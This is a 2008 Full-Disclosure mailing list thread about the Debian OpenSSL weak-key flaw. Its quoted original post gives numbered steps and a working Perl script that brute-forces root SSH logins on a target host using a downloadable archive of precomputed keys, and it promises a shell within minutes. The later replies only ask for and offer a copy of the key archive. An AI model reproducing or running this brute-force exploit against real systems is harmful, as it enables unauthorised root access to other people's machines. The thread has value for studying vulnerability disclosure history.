Yes Fredrick Diggle will get you a copy :) On Sun, May 18, 2008 at 10:13 AM, bob harley <[EMAIL PROTECTED]> wrote: > Anyone have a copy of rsa.2048.tar.bzip2? The web server isn't playing > nicely ;-) > > On Thu, May 15, 2008 at 2:35 AM, Markus Müller <[EMAIL PROTECTED]> wrote: >> >> Hi full-disclosure, >> >> the debian openssl issue leads that there are only 65.536 possible ssh >> keys generated, cause the only entropy is the pid of the process >> generating the key. >> >> This leads to that the following perl script can be used with the >> precalculated ssh keys to brute force the ssh login. It works if such a >> keys is installed on a non-patched debian or any other system manual >> configured to. >> >> On an unpatched system, which doesn't need to be debian, do the following: >> >> 1. Download http://www.deadbeef.de/rsa.2048.tar.bzip2 >> >> 2. Extract it to a directory >> >> 3. Enter into the /root/.ssh/authorized_keys a SSH RSA key with 2048 >> Bits, generated on an upatched debian (this is the key this exploit will >> break) >> >> 4. Run the perl script and give it the location to where you extracted >> the bzip2 mentioned. >> >> #!/usr/bin/perl >> my $keysPerConnect = 6; >> unless ($ARGV[1]) { >> print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n"; >> print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n"; >> print "By [EMAIL PROTECTED]"; >> exit 0; >> } >> chdir($ARGV[0]); >> opendir(A, $ARGV[0]) || die("opendir"); >> while ($_ = readdir(A)) { >> chomp; >> next unless m,^\d+$,; >> push(@a, $_); >> if (scalar(@a) > $keysPerConnect) { >> system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i >> ".$_ } @a)." ".$ARGV[1]); >> @a = (); >> } >> } >> >> 5. Enjoy the shell after some minutes (less than 20 minutes) >> >> Regards, >> Markus Mueller >> [EMAIL PROTECTED] >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/